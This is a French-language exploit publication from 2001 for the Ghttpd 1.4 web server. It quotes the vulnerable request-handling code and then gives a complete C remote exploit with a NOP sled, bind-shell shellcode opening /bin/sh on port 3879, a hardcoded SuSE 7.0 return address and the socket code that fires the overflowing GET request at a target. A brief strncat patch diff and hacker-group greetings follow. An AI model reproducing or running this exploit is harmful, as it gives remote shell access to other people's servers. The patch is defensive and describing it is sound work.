.:: Exploit : Ghttpd v.1.4 ::.

/* protocol.c */ int serveconnection(int sockfd) { char filename[255]; ... Log("Connection from %s, request = \"GET %s\"", inet_ntoa(sa.sin_addr), ptr); if(!strncmp(ptr, thehost->CGIBINDIR, strlen(thehost->CGIBINDIR))) {/* Trying to execute a cgi-bin file ? lets check */ ptr2 = strstr(ptr, "?"); if(ptr2!=NULL) { ptr2[0] = '\0'; flag = 1; } strcpy(filename, thehost->CGIBINROOT); ptr += strlen(thehost->CGIBINDIR); strcat(filename, ptr); // Filename = program to execute // ptr = filename in cgi-bin dir // ptr2+1 = parameters ... strcpy(filename, thehost->DOCUMENTROOT); strcat(filename, ptr); ... /* Ou */ PTR == Entrée socket CGIBINROOT == /usr/local/ghttpd/cgi-bin DOCUMENTROOT == /usr/local/ghttpd/htdocs



   /*--------------------------------------------*/

   /* Ghttpd 1.4 remote exploit                  */

   /*--------------------------------------------*/

   /* Auteurs   : Lionel . Gangstuck             */

   /* Contact   : cronos56@yahoo.com             */

   /*             k0deback@yahoo.fr              */

   /* WEB       : http://www.secu-fr.org         */

   /* IRC       : #:secu-fr                      */

   /*--------------------------------------------*/

   /* Party 2001 Lionel & Gangstuck - 30/06/2001 */

   /*--------------------------------------------*/

   /* GET /[NOPS] [shellcode] [ret] [ret]        */

   /* ret sur SuSe 7.0 : 0xbfffb504 == OK        */

   /*                    0xbfffb515 == LTRACE    */

   /*--------------------------------------------*/



   #include <stdio.h>

   #include <string.h>

   #include <unistd.h>

   #include <sys/types.h>

   #include <netinet/in.h>

   #include <netdb.h>

   #define TAILLE 157        // taille du buffer à overflowder



   struct in_addr victim;

   char overflow[4096];

   char shellcode[] =        // bind a shell to port 3879

    "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"

   "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"

   "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"

   "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"

   "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"

   "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"

   "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"

   "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";



   /* mise en place de l'overflow */

   int overflowed(char *ret){

       int i;

       memset(overflow, 0, sizeof(overflow));

       strcpy(overflow,"GET /");

         for(i=0;i<(TAILLE-(strlen(shellcode))); i++){

           strcat(overflow,"\x90");

         }

       strcat(overflow, shellcode);

       strcat(overflow, ret);

       strcat(overflow, ret);

   }



   int envoie(struct in_addr addr,char *cport)

   {

   struct sockaddr_in serv;

   int s;

   int port=atoi(cport);



   s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

   bzero(&serv,sizeof(serv));

   memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr));

   serv.sin_port=htons(port);

   serv.sin_family=AF_INET;

     if (connect(s,(struct sockaddr *)&serv,sizeof(serv)) < 0){

       perror("connect");

       exit(0);

     }

   write(s,overflow,strlen(overflow));

   write(s,"\n\n",2);

   close(s);

   }



   int host_to_ip(char *hostname,struct in_addr *addr)

   {

   struct hostent *res;



   res=gethostbyname(hostname);

     if (res==NULL)

       return(0);

   memcpy((char *)addr,res->h_addr,res->h_length);

   return(1);

   }





   int main(int argc, char **argv){

       char ret[8], serveur[256], port[8];

       printf("Exploit ghttpd_1.4 by Lionel and GangstucK\n\n");

         if(argc<2) {

           printf("Usage : %s <serveur IP> [port]\n", argv[0]);

           exit(0);

         }

         if(argc==3){

           strncpy(port, argv[2], 7);

         }

         else{

           strcpy(port, "80\0");

         }

       strcpy(ret, "\x04\xb5\xff\xbf"); // ret pour suse 7.0

       strncpy(serveur, argv[1], sizeof(serveur)-1);

       overflowed(ret);

         if (!host_to_ip(serveur,&victim))

         {

           fprintf(stderr,"Hostname lookup failure\n");

           exit(0);

         }

       envoie(victim,port);

       printf("Remote shell listening to port 3879\n");

       exit(0);

   }

44a45 > int tno; 106,107c107,108 < strcat(filename, ptr); < --- > tno = strlen(filename); > strncat(filename, ptr, sizeof(filename)-tno); 143,144c144,145 < strcat(filename, ptr); < --- > tno = strlen(filename); > strncat(filename, ptr, sizeof(filename)-tno);

- Gr33t'z - Secu-fr / Tzero / Subculture / Frstylez / Phreakon / Tipiak / ... - #:secu-fr / #tzero / #shellscript / #ack / ... - Descript, Renar, RoX, Martony, Wp92, Vanille, ad, sebsb, Manak, CrazyLord, Kryl, Medgi, Spud, Klemm, Psirac, OUAH, ohm, Saperus, Tipiak, Bernie, Van, tout ceux qui nous soutiennent/aident/connaissent et que nous oublions ici, à toutes les taspé, les freestylers et les djeunz de l'univers... et une speciale à l'3l33t m00nc0wb0y (tu sux man)... - Publications + http://www.security-focus.com/ : 30/06/01 + http://www.nightbirdfr.com/ : 06/07/01 + http://www.hack.co.za/ : 07/07/01 .................................................................................... * Gangstuck : "La conscience c'est comme les traces.. ça s'essuie.." * Lionel : "Encore une mission reussi avec succes par CanardWC, Koin Koin!"